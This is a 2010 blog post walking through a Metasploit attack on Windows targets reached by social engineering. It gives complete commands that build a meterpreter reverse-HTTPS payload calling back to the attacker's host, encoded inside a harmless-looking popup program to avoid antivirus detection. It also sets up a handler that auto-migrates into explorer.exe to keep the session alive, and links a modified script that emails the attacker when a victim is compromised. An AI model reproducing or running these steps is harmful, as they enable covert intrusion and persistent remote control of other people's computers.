Wednesday, October 6, 2010

Metasploit migrate and e-mail.

Not all hacks happen instantly sometimes you have to wait. The problem is that you might have to wait for days especially when social engineering is taking part in the process.

Even if all things goes well and the attack succeed the payload is a meterpreter connect back shell that will take me to the magic world of new and exciting data. Some problems here, the binary in order to go undetected is encoded using a custom template ( a custom small application that will show a popup ) and this is problem A. This application will just run for some seconds and then it will close, closing meterpreter on the way and my connection. Another problem is that i don't know when the connection is going to take place, it might take place in a few days or even in a couple of weeks that will be problem B.

Problem A is solved easy using a migrate script to migrate into another process and preferably, explorer.exe will be of my taste. So the story on the metasploit console goes like this

./msfpayload windows/meterpreter/reverse_https LHOST=my_dynamic_dns_host LPORT=443 R |./msfencode -k -x ./popup.exe -c 3 -e x86/shikata_ga_nai -t exe -o popup_out.exe

will create a roughly undetected binary with meterpreter inside.

On meterpreter console now running under screen,
./msfconsole

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST my_dynamic_dns_host
set LPORT 443
set AutoRunScript migrate explorer.exe
exploit -j


This will take care of problem A.

Moving on to problem B now.

By default metasploit doesn't provide us any method to inform the attacker for the process of the attack, if he is not looking at the console screen directly. To overcome this i made a small modification to the migrate.rb script located at scripts/ directory on the metasploit root directory. This small modification does the following, when the attack succeeds and migration is complete a mail will be send to a specific address to inform about the success.

meterpreter > run migrate notepad.exe                      
[*] Current server process: Explorer.EXE (3156)
[*] Migrating to notepad.exe...
[*] Migrating into process ID 5064
[*] New server process: notepad.exe (5064)
[*] Emailing myself@myhost

The modified migrate.rb can be found here :  http://www.deventum.com/research/migrate.rb , if you use it don't forget to change the e-mail address :)